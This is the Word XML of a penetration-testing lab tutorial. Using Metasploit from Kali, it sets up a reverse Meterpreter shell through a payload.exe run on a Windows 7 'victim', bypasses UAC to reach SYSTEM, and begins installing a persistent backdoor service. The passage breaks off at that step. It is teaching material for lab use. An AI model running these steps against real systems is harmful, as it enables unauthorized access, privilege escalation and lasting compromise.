          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A394F9C" wp14:editId="33B009C3">
            <wp:extent cx="5734850" cy="6477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B54E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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4463BF" w14:textId="3CA4F1F3" w:rsidR="00B702ED" w:rsidRPr="00415975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next prompt, set the IP address for your LHOST using the IP address assigned </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali install</w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. At the prompt, type, </w:t>
      </w:r>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set LHOST 10.0.2.8</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00415975" w:rsidRPr="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is my IP address</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA" w:rsidRPr="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00415975" w:rsidRPr="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> yours will differ!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3A49A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63489C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03733B83" wp14:editId="76BEB082">
            <wp:extent cx="5763429" cy="885949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787E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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F215DBA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">At the next prompt, set the port number for the listening port to 4444. At the prompt, type, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E158E3F" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRPr="0063489C" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0063489C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFEF375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63489C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C86539B" wp14:editId="184215D6">
            <wp:extent cx="4533900" cy="93675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6436" cy="9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B0FD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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A689973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next prompt, launch the exploit by typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00606E57">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pressing enter, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D3ABD2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63489C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4C72E2" wp14:editId="21E00E29">
            <wp:extent cx="5086350" cy="164582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6738" cy="16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3F01" w14:textId="667A392A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Kali is now waiting patiently for our Windows 7 Pro victim to launch the payload.exe file and establish a reverse shell using a Meterpreter. </w:t>
      </w:r>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(See the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00415975" w:rsidRPr="00415975">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>previous lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on how to create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the  payload.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00415975">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844C72F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Return to your Windows 7 Pro machine. Open the Documents folder and 2X click the payload.exe file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A03EF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2B8C0E5E" wp14:editId="370FECF6">
            <wp:extent cx="5943600" cy="1971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5A198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When prompt, click the Run button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03651FC9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790277C6" wp14:editId="6EB9E209">
            <wp:extent cx="3181350" cy="237836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409" cy="239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11425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Return to your Kali terminal, and you should see a Meterpreter prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEBD23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F7208C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C215DE4" wp14:editId="571BDFF3">
            <wp:extent cx="5943600" cy="7162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BE8F" w14:textId="21B296D9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We next need to escalate our privileges by bypassing the Windows 7 User Access Control feature. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD3B6E" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60AC4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 7 privilege escalation using UAC bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DCFBE" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B60AC4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">At the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter prompt, type, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B60AC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49C76B43" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRPr="00C870C0" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function returns the real user ID of the calling process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can try and escalate our privileges using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, but this operation fails as the command is not supported. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026ACEE0" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="636B4B4F" wp14:editId="26351454">
            <wp:extent cx="5943600" cy="9753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1036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C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We need to bypass the UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get escalated privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To do this, we first need to background our current Meterpreter session. We do this by typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C870C0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the prompt. Once the session has been background, we need to search for a UAC bypass exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DC13C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C870C0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D59B34E" wp14:editId="55409A8A">
            <wp:extent cx="3715268" cy="5715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EE92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prompt, type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypassuac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF0D5C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2A758CDB" wp14:editId="7AA97689">
            <wp:extent cx="3992451" cy="1502613"/>
            <wp:effectExtent l="0" t="0" r="8255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328" cy="154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76B6" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At the prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00912BE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912BE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypassuac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D86FA5B" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523562D3" wp14:editId="651D18A2">
            <wp:extent cx="5404223" cy="2820473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5453" cy="28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77E2" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The missing parameter is the session ID. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We can list all meterpreter session running using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D236D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6F8A3" w14:textId="77777777" w:rsidR="00B702ED" w:rsidRPr="00D236D7" w:rsidRDefault="00B702ED" w:rsidP="00B702ED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846F2D8" wp14:editId="44DF02D7">
            <wp:extent cx="5847008" cy="887046"/>
            <wp:effectExtent l="0" t="0" r="1905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217" cy="91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D4F64" w14:textId="6980F539" w:rsidR="00B702ED" w:rsidRDefault="00B702ED" w:rsidP="00B702ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3974">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From the results, we know that our </w:t>
      </w:r>
      <w:r w:rsidR="00415975" w:rsidRPr="00BF3974">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3974">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> session is using the session ID of 1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3BA8CA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We next need to set the SESSION parameter to 1. At the prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3974">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC711CA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BF3974">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A7CB8B0" wp14:editId="5DC615D2">
            <wp:extent cx="4248743" cy="38105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4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42026C5E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prompt, type run. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720420E5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134009FC" wp14:editId="1ACBC338">
            <wp:extent cx="5937250" cy="2472690"/>
            <wp:effectExtent l="0" t="0" r="635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EEDB9" w14:textId="226A3BFC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We check the real user ID of the calling process. Now that we have bypassed the UAC, we can escalate our privileges using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73AA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, and we are currently running as NT AUTHORITY\SYSTEM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608BF109" w14:textId="36BF11F2" w:rsidR="00B702ED" w:rsidRPr="00B702ED" w:rsidRDefault="00415975" w:rsidP="00B702ED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szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating a Backdoor Using </w:t>
      </w:r>
      <w:r w:rsidR="00B702ED" w:rsidRPr="00B702ED">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFAAE2" w14:textId="72AA12FB" w:rsidR="00B702ED" w:rsidRPr="00B702ED" w:rsidRDefault="00F207CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In this part of the lab, you will learn how to </w:t>
      </w:r>
      <w:r w:rsidR="00B702ED">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">upload an executable to our Windows 7 target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>creating</w:t>
      </w:r>
      <w:r w:rsidR="00B702ED">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a persistent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00B702ED">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. The new service will </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>establish a reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00B702ED">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> whenever the service is running. Admin or system privilege is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEF1AC" w14:textId="77777777" w:rsid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 xml:space="preserve">At the Meterpreter prompt, type, </w:t>
      </w:r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>background</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF504A2" w14:textId="5591F5A9" w:rsidR="0012481E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 xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38D3CB" w14:textId="5B8A405D" w:rsid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 w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD662EA" wp14:editId="6D9D9AA6">
            <wp:extent cx="3858163" cy="619211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262C" w14:textId="01A70D8A" w:rsid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>At the Metasploit prompt</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> type the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162A827" w14:textId="77777777" w:rsidR="00CB5EDC" w:rsidRDefault="00CB5EDC" w:rsidP="00CB5EDC">
      <w:pPr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</w:pPr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>use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>persistence_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60D9B596" w14:textId="6AB1608A" w:rsidR="00CB5EDC" w:rsidRDefault="00CB5EDC" w:rsidP="00CB5EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
